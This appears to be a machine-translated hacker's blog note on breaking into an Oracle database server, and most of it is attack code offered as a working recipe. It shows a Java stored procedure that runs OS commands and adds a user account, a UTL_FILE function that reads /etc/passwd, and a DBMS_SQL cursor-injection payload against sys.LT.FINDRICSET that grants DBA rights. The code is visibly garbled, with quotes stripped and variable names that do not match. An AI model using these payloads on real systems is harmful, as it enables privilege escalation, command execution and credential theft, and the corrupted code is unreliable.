Hacking Oracle cursor Injection

Linx2008 this is a note two years ago. The content has been deleted.

First, an evil method is used to connect to the oracle server... (process omitted)

Soon, I connected to the oracle server and found that:
1. the dba permission is not granted after the connection.
2. You cannot use SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to escalate permissions.
3. Run SELECT UTL_HTTP.request (http: // xxxxxxxxxxx/login. jsp) FROM dual and the oracle server cannot connect to the network.

Fortunately,
Run
Create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;

Successful! This user has the create proceduce permission.

Now I want to create a java extension and execute the command:

Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(cmd.exe c (args ). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str;} catch (Exception e) {return e. toString ();}}}

Begin dbms_java.grant_permission (PUBLIC, SYS: java. io. FilePermission, <all files>, execute); end;

Create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. String) return String

Select * from all_objects where object_name like % LINX %
Grant all on LinxRunCMD to public
Select LinxRunCMD (cmd/c net user linx/add) from dual

But the first step gets stuck. The server cannot create java extensions for some unknown reason !!
Fortunately, we also have the UTL library available to use:

Create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
FHandler UTL_FILE.FILE_TYPE;
Buf varchar2 (4000 );
Output varchar2 (8000 );
BEGIN
FHandler: = UTL_FILE.FOPEN (UTL_FILE_DIR, filename, r );
Loop
Begin
Utl_file.get_line (fHandler, buf );
DBMS_OUTPUT.PUT_LINE (Cursor: | buf );
Exception
When no_data_found then exit;
End;
Output: = output | buf | chr (10 );
End loop;
UTL_FILE.FCLOSE (fHandler );
Return output;
END;

UTL_FILE_DIR must be used first:

Create or replace directory UTL_FILE_DIR AS/etc;

Specify a directory. However, no permission is found after running. I had to find a way to raise the right.

***************

I wrote N pdf files to introduce this technology. I simplified the Code:

DECLARE
Skype NUMBER;
BEGIN
PY: = DBMS_ SQL .OPEN_CURSOR;
DBMS_ SQL .PARSE (ACC, declare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user; commit; end;, 0 );
DBMS_OUTPUT.PUT_LINE (Cursor: | metrics );
Begin sys. LT. FINDRICSET (. | dbms_ SQL .execute (| YY |) --, x); END;
Raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE (Cursor: | ACC );
When others then DBMS_OUTPUT.PUT_LINE (Cursor: | ACC );
END;

After running the command, you will have the dba permission to reconnect to the database ......

Now you can read the file:

Create or replace directory UTL_FILE_DIR AS/etc;
Select LinxUTLReadfile (passwd) from dual

It's easy to follow.